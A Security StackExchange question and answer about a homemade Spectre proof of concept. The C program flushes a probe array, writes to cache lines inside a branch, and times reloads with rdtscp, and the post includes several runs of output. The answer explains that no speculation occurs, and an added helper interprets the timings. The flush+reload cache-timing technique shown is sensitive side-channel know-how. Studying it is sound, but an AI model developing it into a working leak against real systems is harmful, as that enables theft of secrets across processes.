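After a long discussion in this question (thanks for the help!), I came up with a simple PoC based on the Spectre paper.
It seems to be consistent; I also tried other characters and got similar results.
Execution: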
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: E time: 96
trying: X time: 93
trying: W time: 93
trying: F time: 93
trying: O time: 93
trying: J time: 93
trying: C time: 93
trying: K time: 93
trying: Y time: 93
trying: T time: 93
trying: D time: 93
trying: M time: 93
trying: L time: 93
trying: P time: 93
trying: Q time: 93
trying: A time: 93
trying: B time: 93
trying: V time: 93
trying: N time: 93
trying: I time: 93
trying: U time: 93
trying: S time: 93
trying: H time: 93
trying: G time: 93
trying: Z time: 8152
trying: R time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: R time: 96
trying: X time: 92
trying: F time: 93
trying: O time: 93
trying: C time: 93
trying: P time: 93
trying: W time: 93
trying: U time: 93
trying: H time: 93
trying: T time: 93
trying: G time: 93
trying: Z time: 259
trying: K time: 93
trying: V time: 93
trying: J time: 93
trying: D time: 96
trying: M time: 93
trying: Q time: 93
trying: L time: 93
trying: E time: 93
trying: B time: 93
trying: S time: 93
trying: A time: 93
trying: Y time: 93
trying: N time: 93
trying: I time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: S time: 97
trying: W time: 93
trying: C time: 93
trying: V time: 93
trying: K time: 93
trying: P time: 93
trying: T time: 93
trying: Y time: 93
trying: A time: 93
trying: U time: 93
trying: N time: 93
trying: D time: 93
trying: O time: 93
trying: J time: 93
trying: R time: 93
trying: M time: 93
trying: F time: 93
trying: Q time: 93
trying: G time: 93
trying: H time: 93
trying: I time: 93
trying: E time: 93
trying: B time: 93
trying: Z time: 230
trying: L time: 93
trying: X time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: B time: 97
trying: A time: 93
trying: P time: 93
trying: I time: 93
trying: M time: 93
trying: E time: 93
trying: W time: 93
trying: H time: 93
trying: V time: 93
trying: D time: 93
trying: N time: 93
trying: Y time: 93
trying: T time: 93
trying: K time: 93
trying: J time: 93
trying: X time: 93
trying: R time: 93
trying: S time: 93
trying: L time: 93
trying: U time: 93
trying: G time: 93
trying: C time: 93
trying: Z time: 328
trying: O time: 93
trying: Q time: 93
trying: F time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: B time: 97
trying: G time: 93
trying: O time: 93
trying: X time: 93
trying: N time: 93
trying: F time: 93
trying: A time: 93
trying: Q time: 93
trying: Y time: 93
trying: M time: 93
trying: S time: 93
trying: K time: 93
trying: I time: 93
trying: W time: 93
trying: J time: 93
trying: R time: 93
trying: C time: 93
trying: V time: 93
trying: L time: 93
trying: Z time: 272
trying: P time: 93
trying: U time: 93
trying: H time: 92
trying: T time: 93
trying: E time: 93
trying: D time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: R time: 97
trying: A time: 95
trying: M time: 153
trying: F time: 95
trying: H time: 93
trying: L time: 93
trying: D time: 92
trying: G time: 93
trying: K time: 93
trying: U time: 93
trying: S time: 93
trying: W time: 93
trying: O time: 97
trying: Y time: 93
trying: Z time: 289
trying: C time: 93
trying: P time: 93
trying: Q time: 100
trying: B time: 92
trying: J time: 92
trying: I time: 92
trying: V time: 95
trying: E time: 93
trying: X time: 93
trying: T time: 93
trying: N time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: P time: 98
trying: I time: 93
trying: F time: 93
trying: L time: 93
trying: W time: 93
trying: D time: 93
trying: V time: 93
trying: S time: 93
trying: H time: 93
trying: J time: 93
trying: K time: 93
trying: M time: 93
trying: O time: 93
trying: A time: 93
trying: Z time: 363
trying: X time: 93
trying: C time: 93
trying: Y time: 93
trying: E time: 93
trying: Q time: 93
trying: B time: 93
trying: R time: 93
trying: N time: 93
trying: T time: 93
trying: U time: 93
trying: G time: 93

Sample Spectre PoC

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <time.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
int main(void)
{
    volatile uint8_t array1[26] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 };
    uint8_t array2[256 * 512];
    for(int i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    for(int i = 0; i < 256; i++)
        _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
    printf("%c should be cached\n", array1[25]);
    int dummy = 0;
    /* write to the array2 line of every letter except index 25 ('Z') */
    for(int i=0; i<26; i++) {
        if (i != 25) {
            array2[array1[i] * 512] = array1[i];
        }
    }
    int t0,time_taken = 0;
    unsigned int junk = 0; /* __rdtscp takes an unsigned int pointer */
    int mix_i=0;
    int i,j;
    int aux,res;
    char RandomId[26];
    char ListId[26]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90};
    srand(time(NULL));
    /* build a random permutation of 'A'..'Z'; -1 marks a letter already used */
    for(i=0; i<26; i++)
    {
        res = rand() % 26;
        aux = ListId[res];
        if (ListId[res] != -1)
        {
            RandomId[i] = aux;
            ListId[res] = -1;
        }
        else
            i--;
    }
    volatile uint8_t * addr;
    int y=0;
    /* time one read of each letter's array2 line, in the random order */
    for(int i=0; i<26; i++)
    {
        mix_i = RandomId[i];
        addr = &array2[mix_i * 512];
        t0 = __rdtscp(&junk);
        junk = *addr;
        time_taken = __rdtscp(&junk) - t0;
        if(mix_i>=65 && mix_i<=90)
            printf("trying: %c time: %i\n",mix_i,time_taken);
    }
    return 0;
}

However, my biggest question is:
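Is there something wrong with this? Where is my mistake?
Because it shows a higher access time for the cached (speculatively loaded) value?
I am running an AMD A10-5757M processor.

Posted on 2018-01-18 09:06:49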
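You flush the array out of the cache here -

for(int i = 0; i < 256; i++)
    _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

Then you pull it back into the cache:

for(int i=0; i<26; i++) {
    if (i != 25) {
        array2[array1[i] * 512] = array1[i];
    }
}

This shows that for i == 25 the if branch is not taken (i.e. it is not speculatively executed). Every other page in the array is cached, but the page referenced by 'Z' is not.
As I said in your previous question, you really need to understand how the proof of concept you are trying to replicate works before you will get anywhere.
As for why there is no speculative execution, there are many possibilities. For example, you haven't tried to train the branch much. The compiler or the processor may also have optimized out the != 25 and simply reduced the "i < 26" statement.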
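
An added example, not part of the original question or answer: a small C helper that interprets a probe run like the ones printed above. It embeds the timings of the question's second run, treats the median as the latency of the majority state, and reports whether the outlier is slower (the single uncached line, as the answer explains) or faster (what a working probe would show for a leaked byte). The function names and the factor-of-2 threshold are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NPROBES 26

/* Timings of the question's second run, in the order printed (Z is index 11). */
static const char page_letters[NPROBES + 1] = "RXFOCPWUHTGZKVJDMQLEBSAYNI";
static const int page_times[NPROBES] = {
    96, 92, 93, 93, 93, 93, 93, 93, 93, 93, 93, 259, 93,
    93, 93, 96, 93, 93, 93, 93, 93, 93, 93, 93, 93, 93 };

static int cmp_int(const void *a, const void *b)
{
    return (*(const int *)a > *(const int *)b) - (*(const int *)a < *(const int *)b);
}

/* Median of n (<= NPROBES) timings: the latency of the majority state. */
int median_time(const int *t, int n)
{
    int tmp[NPROBES];
    memcpy(tmp, t, (size_t)n * sizeof(int));
    qsort(tmp, (size_t)n, sizeof(int), cmp_int);
    return tmp[n / 2];
}

/* Returns the index of the probe furthest from the median and sets *kind:
 *  +1  outlier is slower than the rest (the one miss among hits)
 *  -1  outlier is faster than the rest (the one hit among misses)
 *   0  nothing differs from the median by a factor of 2 (assumed threshold) */
int find_outlier(const int *t, int n, int *kind)
{
    int med = median_time(t, n), best = 0;
    for (int i = 1; i < n; i++)
        if (abs(t[i] - med) > abs(t[best] - med))
            best = i;
    if (t[best] >= 2 * med)      *kind = +1;
    else if (2 * t[best] <= med) *kind = -1;
    else                         *kind = 0;
    return best;
}

int main(void)
{
    int kind, idx = find_outlier(page_times, NPROBES, &kind);
    printf("median %d, outlier %c (%d cycles): %s\n",
           median_time(page_times, NPROBES), page_letters[idx], page_times[idx],
           kind > 0 ? "slow, the only line NOT cached" :
           kind < 0 ? "fast, the only line cached" : "no clear outlier");
    return 0;
}
```

On the page's data the median is the cache-hit latency, so a slow 'Z' means the write guarded by `i != 25` never touched that line, architecturally or speculatively.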
https://security.stackexchange.com/questions/177880